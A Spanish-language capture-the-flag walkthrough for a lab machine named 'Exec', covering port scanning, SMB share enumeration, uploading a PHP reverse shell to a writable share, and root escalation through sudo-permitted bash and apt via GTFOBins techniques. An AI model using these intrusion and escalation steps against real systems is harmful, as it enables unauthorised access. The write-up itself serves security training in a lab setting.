Exec

🔍 Dificultad: Muy Fácil

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.74

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open 192.168.1.74 --min-rate 5000 -n

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, el puerto 22 perteneciente al servicio SSH, el puerto 80 perteneciente al servicio HTTP, el puerto 139 y el puerto 445, ambos pertenecientes al servicio SMB (Server Message Block), están abiertos, por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80,139,445 -v 192.168.1.74

para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 80. Como podemos ver es la página de por defecto de Apache.

Revisamos directorios.

gobuster dir -u http://192.168.1.74 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

No encontramos nada por lo que revisamos el servicio SAMBA al listar los directorios compartidos.

smbclient -N -L 192.168.1.74

Vemos que permisos tenemos.

smbmap -H 192.168.1.74

Tenemos permisos de escritura y lectura en el directorio compartido /server.

smbclient //192.168.1.74/server

🚀 EXPLOTACIÓN

Voy a intentar subir una Reverse Shell ya que parece ser que corresponden a las páginas del puerto 80.

put revshell.php

Hacemos el tratamiento de la TTY para trabajar más cómodos.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

bash | GTFOBins

sudo -u s3cur4 /usr/bin/bash

apt | GTFOBins

sudo -u root /usr/bin/apt changelog apt
!/bin/bash

Ya somos root.